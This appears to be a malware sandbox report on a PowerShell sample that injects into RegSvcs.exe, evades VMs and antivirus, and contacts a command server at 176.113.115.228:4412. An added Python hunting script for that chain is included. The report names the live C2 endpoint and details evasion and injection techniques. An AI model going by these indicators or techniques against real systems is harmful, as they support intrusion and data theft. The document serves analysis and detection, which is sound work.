            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.csHigh entropy of concatenated method names: 'uLcpjPuRlAYcVXjFYFmtEmE6IG3WW1Mtzr0RIFk9A9EyQrTvzKXXIVg2Kl9aPa4ZUwxDazhSAPcV9OBgEpQgQkmuIDh4', 'YKbSLHwMqgcS2pKolhOEHj3xgyFveKjEKCcidxigp4U5yTh4YfVyGzBJwlJcnpP19L9VroiHmlyJuG3idLBl3mCSn6Mm', 'zp4H0yQ0UehqO8XjWJBobcRnUXHtBNNdOJraqUqF18ZXk1TLUu8ITK9oxZPMDksn0W1Pa1Zafu97BPz21DtkMiy8OqlZ', 'acNGsDNjWVethdtOAHfS5bGCQjlG6rRtvqD0T5njuLJ25Dych7HkSrtJugHPYU1sEidvPQu9DNCndDlA1BwGcgqQOkza', 'EYijaGNCTZA5ssmfCphcWBaQGPjJhnvrfOYStXrbSHqI8vBOIvDeyI1zMKU0GLeIXfA35yHnFGzkvaEC5O96miFuyOQc', 'U97RvjaNCYtJiiNUnqYFKh9zn8xByBKWBrFUlgNNn3Y9kt6515ldQ6O97fXLCplKOYUDnKrYZHyKp20hGPYqLPGP43to', 'R5jVmcwmbdTygVF5mseYL7gR5WlhWpIX0SdRUW8f8j2wtWOjloLyaqtkDxKHgIKQPDNnccnKif6EDZ9Yo6kg1mpXNGdk', 'Qg4y4yWaLZe8ShxzIYTJF2jveZABfiLw14cUW2R4nubmT4B60JE6aFHCnRFHd6P1uknuuQS91W4dkE081WxvGjwhal6H', '_5Dw5lOtBWWVVZmthJsMhPC9cUzM5iN8pVJpzSBUee0S2ugQkSBULaRMjDDzaJSKNWwNUaDj8vvXM5hobP13i5jQnjnBo', 'C6Cvo3FCCkFc54Z203lOyD77mYeTf2u9XT2Fg9R2Ovlu8bqQgixOWFkdCS1Rv8ce5gNSQhYPH0Rte8KRxk0sprhtBDOD'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, KqM7OHZ0szpXMKUjIeoOth6ym1BTJiUrVDaPclVtZntCve6UTLSqTCZXaNVMStUq6wiimQow3L7sbJOInc0XhfKzEm5y.csHigh entropy of concatenated method names: 'vlT8dwXrYPa88X2PCSTl1MzL1hOXuK3SZzQ1IazokTftenOcdNLZ16Tqdw7yu5ANElYZlWxgwhbSblLDgcDV4JQrQgpG', 'Yri9DO8KJSBPdGKWv6rruFnfPHpprBjidMFUJ', 'ihN7Vn5g9RpbzGgZUePo8B2niWfMdhDAfds47', 'dvL73CjsvtRpTg2h7knB3tzBhCT55MED4VzHf', 'wdniSU5EpAhXrItpr3nizrrDSwO3uC8vl3Kj9'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, HSVnbciCbEspA5qeJHR9bJSsZnPWuo0GrZXu7MR1gBQLksXwzFXzWWgcApgGUgNKiWg0pwlEuNF.csHigh entropy of concatenated method names: '_2q4wpPRfaVhr0exnXH7y891APAO7HbKET96GKYxGsofSr6nSYQvElSnVQzd4FzDKrH30YbalY8L', 'aWKN8JgTw7OsnLqijS1G2FSf5lKyN1BzTceUS7AusrlZE4LOpgaXcu1Wuwzk1u0fNisdvfs1qDN', 'FJHVAMux3eOse32NPNrYghB0J9OilS0b1VXxCJDJh6FXmI8aBAEjaNpxaC2kopUIxwHOIGv955L', 'jGfRxrKXNpeTM8YO7QPoRJmjQ2fPzxvsBjNLD', 'kZ9PmGZma9rdlqmPKpJGfpPr2H3r8JkUX7S1I', 'AQhlQ1kzIc9Ef2keyCUXapmb3OGi6FTBB2Kva', 'bwp4xqBSAhOIzAidlh3oJJvRivoyrO2AeizFi', 't4NvZMrcVrH5QwGjkdYgS8T6KKd876mvUUikN', 'THXyLh0AdRiaDLkYYQVt4gIf6aGSl2TGIZ0Hv', 'AT1vYmitOvIzOWbQZzZiuTU12J3PiZKXYnxiA'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.csHigh entropy of concatenated method names: 'QVEVDhViI9Msxtf3rvGnQiMgFCItcS0p5D6Z1BTCpo5f6Fde2LisyMtpWmRG', 'N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi', '_1lKSstulGZhXYINkaQd9Asdnrsvcni39pRvUFDpwycuW4xpMqX4hS77iXc6K', 'PNFvO7d1Mi2IWzxMtx1zqm34FyxGrUWwyLxwiGmyaWGVEehy9D6hxvHM1wdE', 'NzfmYhAUGceMKW0mjLzHPddnDgqRRmTH0j9pDfOYWD2DRetXvurMj6Mnbf7d', 'xt4khGVNTHDEWpsI1gYgYvoJk7rms4Vqp4A1OuJJVHK8d5oZr1gtEs3Mjthp', 'zmLy2I6ntM2aqhLCLWxvECHOzvQIBQMbMZRkop6htT9CZiCpf1AwaOdoxGnL', 'lGU48PAY736gsQX2viMog6499aYSQjosLWQRnL6JHFF67P95LEO7pVqTOpjP', 'tWcbDFC14xGh0OYdfNzCiUkAdgC4GkZEk3fcvvyC27fsgUEboKucKM0JQCNsUm0dx4Ht2O9GEH5iHMX42Oi6Tya6c44Z', '_74dfJY6UAxv3WrBFrcQeFUKJoMxCX21o0QCYxD66ZQnhM3Ecq9rhBxcB8PaVyrqjY8AQ0yV0nFGhMbW1o118n5tdEMW0'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.csHigh entropy of concatenated method names: 'MqoWDQphzr8fvnkIH9zEEDcDy7t0zalckB2FahnIxepzgPAMJUZvXj5AyxTxgsTptxlaeKuQhZNQ652tx2KfrWb4jegt', '_39p79IiNTKU0DvuMDijBA51wmgQCy8uNaqsmM', 'VTi9WoIpssJGUPzXMbuMCGF0hZYIeuMphrb9F', 'iVslLiCsMBZl1LzuhzFMYBpuQXVYU9MiwNoac', 'Tmceex3fvKsJkAkUdbAOatlNKDEvt7aWE2OZV'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.csHigh entropy of concatenated method names: 'czdLIkkJGHePbv60eOuYeyQebTWkxLQxtIBDozzTkzeHjwvF0iZ9WLXSXldzQJva2vLFfWmskZn', 'j4gQD94PHOIvfqwgF8eMCnFm32o0IB5Ap5qxVVZaFRLKmaLwc0kz81j2suIyuSG55aCfkON107y', 'K6lV2zL7a7baiNZWYLV0Pa7uhSeNElH68zllWH3k55hqCfKpRoNiazcpVFJa', '_3pqyNrhtv7CmhWTfIKaVxCTfMxlC4kt3daOpdYBPiciiKcXwK1tRoUER3QN3', 'jxIHzBWZPIwWF5Me16RXKy5D4q8hbHjIdITEMMSQOScHVlETgFjWzxFrMe5o', 'rgHuZwYDAVkDNu5fiQGgpbr60XJ1IwMKjiCWFJ4F1RAlRxZyaVrVBTTv5GYA', 'zv9n71pQ0f50PGPzTuOQ3EzQE9qjMl5Z2yV4UK950JFaZNBxHTG4HgTd1jZ6', '_5jeSQ3EJhe2fy9ifCjr5hanazmLriQS1eJsXevXq9vWo9BtzOTy0qlNTrwXI', 'yDpWKuZ7sOl8dZSwzdYBzBedzlS61vlzsjKG7qtZRtuBOZBV1zTFKonJ80td', '_4QkPUIxQHkmMssVmBG2fIN5OOjEuP5kl4bcy3jjLl4JdQehPZIYuCigGsUp8'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: FirmwareTableInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5213
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4629
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 6909
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2940
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1480 | Thread sleep time: -19369081277395017s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: PhysicalDrive0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
            Source: Amcache.hve.0.dr | Binary or memory string: VMware
            Source: Amcache.hve.0.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.0.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.0.dr | Binary or memory string: VMware, Inc.
            Source: Amcache.hve.0.dr | Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.0.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.0.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.0.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.0.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.0.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.0.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.0.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Amcache.hve.0.dr | Binary or memory string: vmci.sys
            Source: Amcache.hve.0.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.0.dr | Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.0.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.0.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.0.dr | Binary or memory string: VMware20,1
            Source: Amcache.hve.0.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.0.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.0.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.0.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.0.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.0.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.0.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.0.dr | Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.0.dr | Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.0.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.0.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DD6008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3716" "2640" "2540" "2656" "0" "0" "2660" "0" "0" "0" "0" "0"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.0.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.0.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.0.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.0.dr | Binary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: 0.2.powershell.exe.1dd90374f68.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.powershell.exe.1dd8f552668.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4340987484.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2378338667.000001DD8F5B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3716, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6568, type: MEMORYSTR

Remote Access Functionality

Source: Yara match. File source: 0.2.powershell.exe.1dd90374f68.2.unpack, type: UNPACKEDPE
Source: Yara match. File source: 0.2.powershell.exe.1dd8f552668.4.unpack, type: UNPACKEDPE
Source: Yara match. File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match. File source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, type: UNPACKEDPE
Source: Yara match. File source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match. File source: 00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: 00000003.00000002.4340987484.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: 00000000.00000002.2378338667.000001DD8F5B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: Process Memory Space: powershell.exe PID: 3716, type: MEMORYSTR
Source: Yara match. File source: Process Memory Space: RegSvcs.exe PID: 6568, type: MEMORYSTR
MITRE ATT&CK Matrix (the 14-column matrix was flattened by extraction; it is listed here per tactic. A bracketed number is the counter the report displays in front of a matched technique; techniques without a number are the unmatched cells of the matrix.)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: [11] Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: [1] DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: [211] Process Injection; [1] DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: [1] Masquerading; [1] Disable or Modify Tools; [241] Virtualization/Sandbox Evasion; [211] Process Injection; [1] Deobfuscate/Decode Files or Information; [1] Obfuscated Files or Information; [2] Software Packing; [1] DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: [241] Security Software Discovery; [1] Process Discovery; [241] Virtualization/Sandbox Evasion; [1] Application Window Discovery; [2] File and Directory Discovery; [23] System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: [11] Archive Collected Data; [1] Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: [1] Encrypted Channel; [1] Non-Standard Port; [1] Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1599699. Sample: b.ps1. Startdate: 26/01/2025. Architecture: WINDOWS. Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures

powershell.exe (started; graph counters 20, 26)
    Signatures: Query firmware table information (likely to detect VMs); Writes to foreign memory regions; Injects a PE file into a foreign processes
    Started: RegSvcs.exe (graph counter 2); wermgr.exe (graph counter 14); conhost.exe

RegSvcs.exe
    DNS/IP: 176.113.115.228, remote port 4412, local port 49709, SELECTELRU, Russian Federation
    Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
    Started: WerFault.exe (graph counters 24, 16)
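The chain the behaviour graph shows (powershell.exe starts the signed .NET utility RegSvcs.exe, injects a PE into it, and the hollowed RegSvcs.exe then connects to 176.113.115.228 on TCP 4412) is the part of this report most worth turning into a hunt. The following is an added example, not code from the Joe Sandbox report: it runs two independent checks over Sysmon-style process-create and network-connect records, so that either half of the chain is still reported if the other event was not logged. The PIDs 3716 and 6568 and the C2 endpoint are taken from the report; the event records are constructed, the Sysmon field names are real but the benign rows (msiexec.exe running RegSvcs.exe, chrome.exe on 443) and the list of other hollowing hosts are assumptions made for the example.

```python
"""Hunt for the powershell.exe -> RegSvcs.exe -> C2 chain seen in the b.ps1 run.

Added example; constructed Sysmon-style telemetry (event ID 1 process create,
event ID 3 network connect). Field names follow Sysmon, values are made up
except for the PIDs and the 176.113.115.228:4412 endpoint from the report.
"""
from dataclasses import dataclass
from ipaddress import ip_address
from typing import List, Tuple, Union

# Signed .NET framework utilities that are popular injection/hollowing hosts.
# RegSvcs.exe is the one in the report; the others are assumptions from the
# same pattern and can be trimmed to what exists in your environment.
HOLLOWING_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe",
                   "msbuild.exe", "aspnet_compiler.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
EXPECTED_PORTS = {80, 443}   # anything else from a hollowing host is worth a look


@dataclass
class ProcessCreate:          # Sysmon event ID 1
    pid: int
    image: str
    parent_image: str


@dataclass
class NetworkConnect:         # Sysmon event ID 3
    pid: int
    image: str
    dest_ip: str
    dest_port: int


Event = Union[ProcessCreate, NetworkConnect]


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_hollowing_chains(events: List[Event]) -> List[Tuple[int, str, str]]:
    """Return (pid, image, reason) for each suspicious observation.

    Signal 1: a hollowing host started by a script host (the injection target).
    Signal 2: a hollowing host talking to a public IP on an unexpected port
              (RegSvcs.exe has no business making outbound connections at all).
    """
    findings = []
    for ev in events:
        img = image_name(ev.image)
        if img not in HOLLOWING_HOSTS:
            continue
        if isinstance(ev, ProcessCreate):
            parent = image_name(ev.parent_image)
            if parent in SCRIPT_HOSTS:
                findings.append((ev.pid, img, f"started by script host {parent}"))
        else:
            dst = ip_address(ev.dest_ip)
            if dst.is_global and ev.dest_port not in EXPECTED_PORTS:
                findings.append((ev.pid, img,
                                 f"outbound to {ev.dest_ip}:{ev.dest_port} "
                                 f"(public IP, non-standard port)"))
    return findings


# Constructed telemetry: the chain from the report plus two benign rows.
SAMPLE_EVENTS: List[Event] = [
    ProcessCreate(3716, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  r"C:\Windows\explorer.exe"),
    ProcessCreate(6568, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
                  r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    NetworkConnect(6568, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
                   "176.113.115.228", 4412),
    # benign (made up): an installer legitimately running RegSvcs, a browser on 443
    ProcessCreate(4100, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
                  r"C:\Windows\System32\msiexec.exe"),
    NetworkConnect(5200, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                   "142.250.74.78", 443),
]

if __name__ == "__main__":
    for pid, img, why in find_hollowing_chains(SAMPLE_EVENTS):
        print(f"PID {pid} {img}: {why}")
```

Run against the constructed events this reports PID 6568 twice (once for the parent, once for the 4412 connection) and nothing for the msiexec.exe or chrome.exe rows. In production the same two predicates map directly onto a Sysmon or EDR query on `ParentImage`/`Image` for event ID 1 and `Image`/`DestinationIp`/`DestinationPort` for event ID 3; the private-address check keeps internal RegSvcs traffic such as COM+ registration out of the results.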

Source | Detection | Scanner | Label
b.ps1 | 13% | Virustotal |
b.ps1 | 8% | ReversingLabs | Win32.Trojan.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
176.113.115.228 | 0% | Avira URL Cloud | safe


No contacted domains info

Name | Malicious | Antivirus Detection | Reputation
176.113.115.228 | true | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2397399939.000001DD9F3EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000000.00000002.2378338667.000001DD8F939000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2397399939.000001DD9F3EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmp | false | | high
